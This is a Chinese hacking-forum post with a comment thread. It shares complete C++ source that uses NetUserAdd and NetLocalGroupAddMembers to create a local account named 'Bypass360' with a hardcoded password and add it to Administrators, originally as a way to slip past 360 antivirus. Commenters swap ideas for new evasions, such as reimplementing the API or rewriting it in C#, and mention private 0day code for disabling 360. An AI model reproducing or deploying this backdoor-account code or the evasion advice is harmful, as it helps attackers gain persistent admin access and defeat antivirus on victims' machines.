最新版360已经拦截netapi加用户了。
最新版360已经拦截netapi加用户了。
源码:
源码:
#ifndef UNICODE
#define UNICODE
#endif
#include <stdio.h>
#include <windows.h>
#include <lm.h>
#include <iostream>
#pragma comment(lib,"netapi32")
int Usage(wchar_t*);
int wmain(int argc, wchar_t* argv[])
{
// 定义USER_INFO_1结构体
USER_INFO_1 ui;
DWORD dwError = 0;
ui.usri1_name = L"Bypass360"; // 账户
ui.usri1_password = L"[email protected]"; // 密码
ui.usri1_priv = USER_PRIV_USER;
ui.usri1_home_dir = NULL;
ui.usri1_comment = NULL;
ui.usri1_flags = UF_SCRIPT;
ui.usri1_script_path = NULL;
//添加名为zzzhhh的用户,密码为p@sswordQq123:
if (NetUserAdd(NULL, 1, (LPBYTE)&ui, &dwError) == NERR_Success)
{
std::cout << "[+] Add Success!!! \n";
std::cout << "[+] UserName:Bypass360 PassWord:[email protected]\n";
}
else
{
//添加失败
std::cout << "[+] Add User Error!\n";
}
// 添加用户到administrators组
LOCALGROUP_MEMBERS_INFO_3 account;
account.lgrmi3_domainandname = ui.usri1_name;
if (NetLocalGroupAddMembers(NULL, L"Administrators", 3, (LPBYTE)&account, 1) == NERR_Success)
{
//添加成功
std::cout << "[+] Add to Administrators Success\n";
}
else
{
//添加失败
std::cout << "[+] Add to Administrators Error!\n";
}
return 0;
}
评论42次
有比数字更流氓的?话说啥环境非得加用户啊?
这就用不了了。。
免杀总有时间有效期,检测到只是时间问题而已
早晚的事
弱弱的请教下,现在api加用户被拦截了,要是还是从api实现,还有啥更好的方法嘛
寻找其他可以用于添加账户的Windows API函数,或者看下NetUserAdd()函数怎么实现的,尝试自己实现一个相似的函数。
用csharp写一个,之前护网还能用。
弱弱的请教下,现在api加用户被拦截了,要是还是从api实现,还有啥更好的方法嘛
实在不能要不然把kill 某0的源代码发出来,发出来我在团队眼里又是个叛徒哈哈
为啥他能回复本人不匿名?测试
因为他是先不匿名评论的,楼主回复之后再改成匿名
这方法都多少年了,被拦不是很正常么
实在不能要不然把kill 某0的源代码发出来,发出来我在团队眼里又是个叛徒哈哈
为啥他能回复本人不匿名?测试
弱弱的说 api添加用户绕360不都是好多年前的操作了吗 。。。。被封感觉一点不意外
这些骚姿势,都是见光死。。。
被拦截一点读不意外 源码公布出来很快就不能用了
实在不能要不然把kill 某0的源代码发出来,发出来我在团队眼里又是个叛徒哈哈
私信可以的。不对外传播
而且不是ring0级kill,而是利用漏洞
实在不能要不然把kill 某0的源代码发出来,发出来我在团队眼里又是个叛徒哈哈
私信可以的。不对外传播
哎绕过我吧,团队的人挖个某0 某绒的0day也不容易,一公开全不能用了,没错我就是晁盖跟前的白日鼠,迟早把大哥害了哈哈,管不住这张嘴
实在不能要不然把kill 某0的源代码发出来,发出来我在团队眼里又是个叛徒哈哈
私信可以的。不对外传播
实在不能要不然把kill 某0的源代码发出来,发出来我在团队眼里又是个叛徒哈哈
谁会发能过的啊。。发了马上加入特征库
这么快就被拦了么。。。
通过调用命令或者API 方式加账号 确实不是普通用户的行为。 被360发现 只能说是或早或晚的事儿。